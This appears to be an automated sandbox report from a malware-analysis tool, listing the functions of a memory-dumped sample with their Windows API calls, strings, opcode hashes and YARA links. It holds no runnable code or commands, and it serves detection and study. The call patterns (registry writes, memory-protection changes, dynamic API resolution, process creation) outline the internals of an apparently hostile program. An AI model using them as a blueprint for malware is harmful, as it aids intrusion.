Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
String ID: t'w$'w
API String ID: 3286078456-1001419206
Opcode ID: c9d8c844314e48a9bd0e59b5a82166e6accd24e959e45d4cd9ced37ab0f8f6e1
Instruction ID: 929aa8c96d23418d8648dafa24f5638577180356b2724d0387cab3f058a0c51b
Opcode Fuzzy Hash: c9d8c844314e48a9bd0e59b5a82166e6accd24e959e45d4cd9ced37ab0f8f6e1
Instruction Fuzzy Hash: 02117375A04306ABD7359FB5DD4DBAE7BBCAF08781F008015F90AE1250DB788940CA65

Uniqueness

Uniqueness Score: -1.00%

Function 00765AE2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00751C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0075E657,00000000,00000000,-00000007,00760969,-00000007,?,?), ref: 00751CAA
Part of subcall function 00751C9B: mbstowcs.NTDLL ref: 00751CC6

lstrlenW.KERNEL32(00000000,7476F560,00000000,?,00000000,?,?,00765859,00000020), ref: 00765B0E
RtlAllocateHeap.NTDLL(00000000,?), ref: 00765B20
CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00765859,00000020), ref: 00765B3D
lstrlenW.KERNEL32(00000000,?,?,00765859,00000020), ref: 00765B49
HeapFree.KERNEL32(00000000,00000000,?,?,00765859,00000020), ref: 00765B5D

Strings

YXv , xrefs: 00765B4B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
String ID: YXv
API String ID: 3403466626-3085246084
Opcode ID: 2890737fd4c3f6188c57dc56455f1d6eea9be5426838c2d1d04157d7678df333
Instruction ID: 8a25557dd7b2323976820f092bd17ae3125fedc03525b5f87f0f81d88b468835
Opcode Fuzzy Hash: 2890737fd4c3f6188c57dc56455f1d6eea9be5426838c2d1d04157d7678df333
Instruction Fuzzy Hash: 50019E72100214FFD7029F98EC88FAA77ACEF09790F018052FA0997160DB789E44DB69

Uniqueness

Uniqueness Score: -1.00%

Function 007640A9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 007640BC
CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 007640CE
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 007640F8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0076410B
CloseHandle.KERNEL32(?), ref: 00764114

Strings

0x%08X, xrefs: 007640B6

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
String ID: 0x%08X
API String ID: 603522830-3182613153
Opcode ID: 511816b4f883ab3d193eaa81d12a214002b675d2b4854e7752f05d4a944d0592
Instruction ID: e8a8c8f04529589d3f2acb243237a2d25117073c83e2964c1a2e0600aa6f1b2d
Opcode Fuzzy Hash: 511816b4f883ab3d193eaa81d12a214002b675d2b4854e7752f05d4a944d0592
Instruction Fuzzy Hash: 1A015E71900229BFDB149F94DC0EDEFBF7CEF05390B008114E91AE2195E7749641CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00769A27 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00778420), ref: 00769A32
RtlLeaveCriticalSection.NTDLL(00778420), ref: 00769A43
VirtualProtect.KERNEL32(8B007730,00000004,00000040,0000007F,?,?,0076C3CE,00000000,00760B38,00778448,00759CF4,00000003,?,?,00760B38), ref: 00769A5A
VirtualProtect.KERNEL32(8B007730,00000004,0000007F,0000007F,?,?,0076C3CE,00000000,00760B38,00778448,00759CF4,00000003,?,?,00760B38), ref: 00769A74
GetLastError.KERNEL32(?,?,0076C3CE,00000000,00760B38,00778448,00759CF4,00000003,?,?,00760B38), ref: 00769A81

Strings

0xw, xrefs: 00769A2B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID: 0xw
API String ID: 653387826-4071435235
Opcode ID: ef85834652e0c78329114de0d9873225b3c13b1664cf17d864e482aec3767582
Instruction ID: 7539e8968a106e8593ff350ea9a089cfed60b79b373430408749006e99c1f6b1
Opcode Fuzzy Hash: ef85834652e0c78329114de0d9873225b3c13b1664cf17d864e482aec3767582
Instruction Fuzzy Hash: EF01A275200704EFD7209F54CC44D6AB7F9FF84350B108528EA5693660DB74EE01DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00766BF0 Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

GetLastError.KERNEL32(?,?,?,00001000,?,00778314,7476F750), ref: 00766C71
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00778314,7476F750), ref: 00766CF6
CloseHandle.KERNEL32(00000000,?,00778314,7476F750), ref: 00766D10
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,00778314,7476F750), ref: 00766D45

Part of subcall function 0075BB52: RtlReAllocateHeap.NTDLL(00000000,?,?,00759236), ref: 0075BB62

WaitForSingleObject.KERNEL32(?,00000064,?,00778314,7476F750), ref: 00766DC7
CloseHandle.KERNEL32(F0FFC983,?,00778314,7476F750), ref: 00766DEE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: fc27f670470536006aed755757273f22ca94f2d984cb7e443921eb08405266e0
Instruction ID: f6286217dc1040a3332b3fbaa3b275a1422605afd2e4920afd48049f57b8c91b
Opcode Fuzzy Hash: fc27f670470536006aed755757273f22ca94f2d984cb7e443921eb08405266e0
Instruction Fuzzy Hash: 3F815771A00619EFCF11CF94C884AADFBB5FF08740F648459E94AAB251D739AE40DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0075A628 Relevance: 9.1, APIs: 6, Instructions: 133registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615C3
Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615CF
Part of subcall function 00761577: memset.NTDLL ref: 00761617
Part of subcall function 00761577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761632
Part of subcall function 00761577: lstrlenW.KERNEL32(0000002C), ref: 0076166A
Part of subcall function 00761577: lstrlenW.KERNEL32(?), ref: 00761672
Part of subcall function 00761577: memset.NTDLL ref: 00761695
Part of subcall function 00761577: wcscpy.NTDLL ref: 007616A7

WaitForSingleObject.KERNEL32(00000000,?,03F09958,?,00000000,00000000,00000001), ref: 0075A6D2
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0075A70C
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0075A72F
RegCloseKey.ADVAPI32(?), ref: 0075A738
WaitForSingleObject.KERNEL32(00000000,0075B19A,00778314), ref: 0075A79C
RtlExitUserThread.NTDLL(?), ref: 0075A7D2

Part of subcall function 007516B4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?,?,007580CF,?,?,?), ref: 007516D2
Part of subcall function 007516B4: GetFileSize.KERNEL32(00000000,00000000,?,?,007580CF,?,?,?), ref: 007516E2
Part of subcall function 007516B4: CloseHandle.KERNEL32(000000FF,?,?,007580CF,?), ref: 00751744

Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 007556D7
Part of subcall function 00755697: GetLastError.KERNEL32(?,00000080,00000000), ref: 007556E1
Part of subcall function 00755697: WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 00755706
Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,00000080,00000000), ref: 00755729
Part of subcall function 00755697: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 00755751
Part of subcall function 00755697: WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 00755766
Part of subcall function 00755697: SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 00755773
Part of subcall function 00755697: CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0075578B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
String ID:
API String ID: 90276831-0
Opcode ID: a7fd2d62a0df61d868eb58bb433434187b436b449d21fd66a60b46183961aa3c
Instruction ID: f97302fa1498a2044cc485cdbddd25ba0b93ec3ccbc919b9e86454ea27380bda
Opcode Fuzzy Hash: a7fd2d62a0df61d868eb58bb433434187b436b449d21fd66a60b46183961aa3c
Instruction Fuzzy Hash: CE516F71A40208FFDB54DF94CC89EED77B9EB08390F008169F909D7261DB789A45CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00757A01 Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 00757A1A

Part of subcall function 00765AE2: lstrlenW.KERNEL32(00000000,7476F560,00000000,?,00000000,?,?,00765859,00000020), ref: 00765B0E
Part of subcall function 00765AE2: RtlAllocateHeap.NTDLL(00000000,?), ref: 00765B20
Part of subcall function 00765AE2: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00765859,00000020), ref: 00765B3D
Part of subcall function 00765AE2: lstrlenW.KERNEL32(00000000,?,?,00765859,00000020), ref: 00765B49
Part of subcall function 00765AE2: HeapFree.KERNEL32(00000000,00000000,?,?,00765859,00000020), ref: 00765B5D

RtlEnterCriticalSection.NTDLL(00000000), ref: 00757A52
CloseHandle.KERNEL32(?), ref: 00757A60
HeapFree.KERNEL32(00000000,?,?,00000001,00001000), ref: 00757B39
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00757B48
HeapFree.KERNEL32(00000000,00000000,00001000), ref: 00757B5B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID:
API String ID: 1719504581-0
Opcode ID: cd223dd8437d8f1eecea98afe83e7c0b14d934277e96a9c0f7e891a150cbeaea
Instruction ID: 197c146e7d36c9700c07b1d3b827efbdd740cc9c25d04f00407beb968dab2ce6
Opcode Fuzzy Hash: cd223dd8437d8f1eecea98afe83e7c0b14d934277e96a9c0f7e891a150cbeaea
Instruction Fuzzy Hash: C641E571604609EBDB159F94EC88FEE777AFB44741F108029FD0897250DBB89E49CB94

Uniqueness

Uniqueness Score: -1.00%

Function 007582E5 Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00751C9B: lstrlen.KERNEL32(00000000,00000008,-00000007,?,?,0075E657,00000000,00000000,-00000007,00760969,-00000007,?,?), ref: 00751CAA
Part of subcall function 00751C9B: mbstowcs.NTDLL ref: 00751CC6

lstrlenW.KERNEL32(00000000,?), ref: 00758338

Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615C3
Part of subcall function 00761577: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 007615CF
Part of subcall function 00761577: memset.NTDLL ref: 00761617
Part of subcall function 00761577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761632
Part of subcall function 00761577: lstrlenW.KERNEL32(0000002C), ref: 0076166A
Part of subcall function 00761577: lstrlenW.KERNEL32(?), ref: 00761672
Part of subcall function 00761577: memset.NTDLL ref: 00761695
Part of subcall function 00761577: wcscpy.NTDLL ref: 007616A7

PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 00758359
lstrlenW.KERNEL32(?), ref: 00758385

Part of subcall function 00761577: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 007616CD
Part of subcall function 00761577: RtlEnterCriticalSection.NTDLL(?), ref: 00761703
Part of subcall function 00761577: RtlLeaveCriticalSection.NTDLL(?), ref: 0076171F
Part of subcall function 00761577: FindNextFileW.KERNEL32(?,00000000), ref: 00761738
Part of subcall function 00761577: WaitForSingleObject.KERNEL32(00000000), ref: 0076174A
Part of subcall function 00761577: FindClose.KERNEL32(?), ref: 0076175F
Part of subcall function 00761577: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00761773
Part of subcall function 00761577: lstrlenW.KERNEL32(0000002C), ref: 00761795

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 007583A2
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 007583C3
PathFindFileNameW.SHLWAPI(0000001E), ref: 007583D8

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID:
API String ID: 2670873185-0
Opcode ID: 1517650c91330b9c3385319b2375d79dd722b44b59c3b4ba69c9bbf5d96107be
Instruction ID: 2fa4e0ad69eeb360b7f252c612c83d58581e97c9418d124d231ba24c2ea3c58f
Opcode Fuzzy Hash: 1517650c91330b9c3385319b2375d79dd722b44b59c3b4ba69c9bbf5d96107be
Instruction Fuzzy Hash: 11319272504245DFC750AF64CC888AFBBE9FF88395F004929F999A3121DB39DD49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 007510FF Relevance: 9.1, APIs: 6, Instructions: 92memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0075111B
lstrlen.KERNEL32(?), ref: 00751131
lstrlen.KERNEL32(?), ref: 00751146
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 007511AB
_snprintf.NTDLL ref: 007511D1
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001), ref: 007511EF

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateFree_snprintf
String ID:
API String ID: 3180502281-0
Opcode ID: 5170a3a0f6ab343088093a923bd0509ba1286cb9875cc9d1c7d75172f52aa44f
Instruction ID: 29b438c40d8c577d9c9be475d4e39089095cb99f9a20933f6bb77735aefdffef
Opcode Fuzzy Hash: 5170a3a0f6ab343088093a923bd0509ba1286cb9875cc9d1c7d75172f52aa44f
Instruction Fuzzy Hash: 77316D3290011DFFCF10DF65DC489EABBAAFB44382B418465FE08A7110DBB99E55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0076B04C Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,?,?,?,0075DF56,?,?,0076DB75,?,00000000), ref: 0076B071
GetProcAddress.KERNEL32(00000000,?), ref: 0076B093
GetProcAddress.KERNEL32(00000000,?), ref: 0076B0A9
GetProcAddress.KERNEL32(00000000,?), ref: 0076B0BF
GetProcAddress.KERNEL32(00000000,?), ref: 0076B0D5
GetProcAddress.KERNEL32(00000000,?), ref: 0076B0EB

Part of subcall function 00766E2F: memset.NTDLL ref: 00766EB0

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: cacd52c0c429fc72dd89a44024754408f12fc3132fdb4d5d6bbda1c30558236c
Instruction ID: 15a69c4958f106794710e981743d9bc86c4ac45d5d198adcaaee18036fe9423f
Opcode Fuzzy Hash: cacd52c0c429fc72dd89a44024754408f12fc3132fdb4d5d6bbda1c30558236c
Instruction Fuzzy Hash: 74214DB050060EEFE711DF6ADC54D6AB7ECEF46384B04855AE809CB211DB7CE945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00770D82 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,00760B59,00000000,?,?,?), ref: 00770D9A
StrChrA.SHLWAPI(00000001,00000020,?,?,?,00760B59,00000000,?,?,?), ref: 00770DAB

Part of subcall function 007709B1: lstrlen.KERNEL32(00000000,?,00000000,00000000,?,0076B876,00000000,?,?), ref: 007709C3
Part of subcall function 007709B1: StrChrA.SHLWAPI(?,0000000D,?,0076B876,00000000,?,?), ref: 007709FB

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00770DEB
memcpy.NTDLL(00000000,?,00000007,?,?,?,00760B59,00000000), ref: 00770E18
memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,00760B59,00000000), ref: 00770E27
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,00760B59,00000000), ref: 00770E39

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: e764e1c39fcb2bf569fc38570c515b467425accf43c1b216606867d3eab5e349
Instruction ID: d92edc22af99d8075742126eb7b0636bb8633a0ac1eae135115ba0e1a6bf50c7
Opcode Fuzzy Hash: e764e1c39fcb2bf569fc38570c515b467425accf43c1b216606867d3eab5e349
Instruction Fuzzy Hash: 06213D72500209FFDB11DF94DC89F9A77A8AF04794F148062B90CDB251D678EE448BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0075E136 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0075E175
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0075E186
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 0075E1A1
GetLastError.KERNEL32 ref: 0075E1B7
HeapFree.KERNEL32(00000000,?), ref: 0075E1C9
HeapFree.KERNEL32(00000000,?), ref: 0075E1DE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: fe131eefb0367b3299ff8851c5d07f71599c55a37a37ad0bd565fe4e53370659
Instruction ID: 2dd22abe280e3e5cd76c15327f1a16e36adda1372d2e51df96b11e053db4b453
Opcode Fuzzy Hash: fe131eefb0367b3299ff8851c5d07f71599c55a37a37ad0bd565fe4e53370659
Instruction Fuzzy Hash: B3113D76501028FBDF225BA5DC48CEFBF7EFF45391B104021F909A1160C6794B95EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00766ED9 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,00000008,?,?,?,0076912F,00000000,?,00007530), ref: 00766EEA
lstrlen.KERNEL32(?,?,?,?,0076912F,00000000,?,00007530), ref: 00766EF1
RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00766F03
_snprintf.NTDLL ref: 00766F29

Part of subcall function 00763F6E: memset.NTDLL ref: 00763F83
Part of subcall function 00763F6E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 00763FBC
Part of subcall function 00763F6E: wcstombs.NTDLL ref: 00763FC6
Part of subcall function 00763F6E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 00763FF7
Part of subcall function 00763F6E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,8Au), ref: 00764023
Part of subcall function 00763F6E: TerminateProcess.KERNEL32(?,000003E5), ref: 00764039
Part of subcall function 00763F6E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 0076404D
Part of subcall function 00763F6E: CloseHandle.KERNEL32(?), ref: 00764080
Part of subcall function 00763F6E: CloseHandle.KERNEL32(?), ref: 00764085

_snprintf.NTDLL ref: 00766F5D

Part of subcall function 00763F6E: GetLastError.KERNEL32 ref: 00764051
Part of subcall function 00763F6E: GetExitCodeProcess.KERNEL32(?,00000001), ref: 00764071

HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 00766F7A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID:
API String ID: 1481739438-0
Opcode ID: dc325e1ea7fd12a5641c6a0172700703d51fc1dbf0853b0a0e5ed20bf7dc552a
Instruction ID: 94d47d720fb9be7cbea721a7c927a7cef4ef048761f453a33253bedfd3ae5c02
Opcode Fuzzy Hash: dc325e1ea7fd12a5641c6a0172700703d51fc1dbf0853b0a0e5ed20bf7dc552a
Instruction Fuzzy Hash: BF11BE72600218BFDF119F64EC88DEE3F69EB053A0B048115FE0D97221D639EA40DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0075800C Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,007521BE), ref: 0075802C
GetProcAddress.KERNEL32(00000000,?), ref: 0075804B
GetProcAddress.KERNEL32(00000000,?), ref: 00758060
GetProcAddress.KERNEL32(00000000,?), ref: 00758076
GetProcAddress.KERNEL32(00000000,?), ref: 0075808C
GetProcAddress.KERNEL32(00000000,?), ref: 007580A2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: d90eedaace361ef6d35698490b8562f56cbad446664e67657fc7bc4b2a352b55
Instruction ID: 7c571bd7ded47083c1ffee05204472bed5e6139a343502b94b4c1f79644bf600
Opcode Fuzzy Hash: d90eedaace361ef6d35698490b8562f56cbad446664e67657fc7bc4b2a352b55
Instruction Fuzzy Hash: 6E11517110070BAFE651AB69DC84C6773ECAF443913058065E90DCB351DE7CDD0ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0076CAF7 Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0076FE29,00000000,00000000,00000008,00000000,?,0076FE29,007699AD,00000000,?), ref: 0076CB0D
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0076CB20
lstrcpy.KERNEL32(00000008,0076FE29), ref: 0076CB42
GetLastError.KERNEL32(0075C2B8,00000000,00000000,?,0076FE29,007699AD,00000000,?), ref: 0076CB6B
HeapFree.KERNEL32(00000000,00000000,?,0076FE29,007699AD,00000000,?), ref: 0076CB83
CloseHandle.KERNEL32(00000000,0075C2B8,00000000,00000000,?,0076FE29,007699AD,00000000,?), ref: 0076CB8C

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 3a2abd49dd9a353f2b12a11af62580db46331e8547bd896b14d4d937c3c22ae3
Instruction ID: 00e77e7f27862cf7da4324e89ca86f86a519fe4892374e939f55c8a04db53c6a
Opcode Fuzzy Hash: 3a2abd49dd9a353f2b12a11af62580db46331e8547bd896b14d4d937c3c22ae3
Instruction Fuzzy Hash: BE1190B1200209EFDB119FB8DC898BABBA9FB013A5710852AF85FC3210D7388D45DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0076E52A Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E53C

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E555
GetCurrentThreadId.KERNEL32 ref: 0076E562
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E56E
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0075A177,000004D2), ref: 0076E57C
lstrcpy.KERNEL32(00000000), ref: 0076E59E

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 1738d39b172da2b269410cded1909c25ac6f1fd72b1a7670108031e26d19f718
Instruction ID: 2ae6a969b31f7546608fa17710e0f14f505ad9207d4afb65a25d4fc506e44591
Opcode Fuzzy Hash: 1738d39b172da2b269410cded1909c25ac6f1fd72b1a7670108031e26d19f718
Instruction Fuzzy Hash: EB01E176900218AB8B205BA99C8CDAB3B6DEF81B847054025BD0AD3101EE6CDA4187B4

Uniqueness

Uniqueness Score: -1.00%

Function 0076816A Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 007681C5
SetLastError.KERNEL32(00000000,?,?,?), ref: 00768219

Strings

vids, xrefs: 00768224

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 6ddf0fa26329a63ba06b691499bdf9cdecb630e7ddbea9d79df85edf16f5e39d
Instruction ID: e1769c8654fcd4a9c0e51e7b41b854099355285860e9b0c29a45be6c09c4bc87
Opcode Fuzzy Hash: 6ddf0fa26329a63ba06b691499bdf9cdecb630e7ddbea9d79df85edf16f5e39d
Instruction Fuzzy Hash: 2E8118B1D00229DFCF50DFA5C88599DBBB9AF08740F10816AF81AA7251DB789A41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00753D45 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 00753DCF
lstrlen.KERNEL32(?,?), ref: 00753E00
memcpy.NTDLL(00000008,?,00000001), ref: 00753E0F
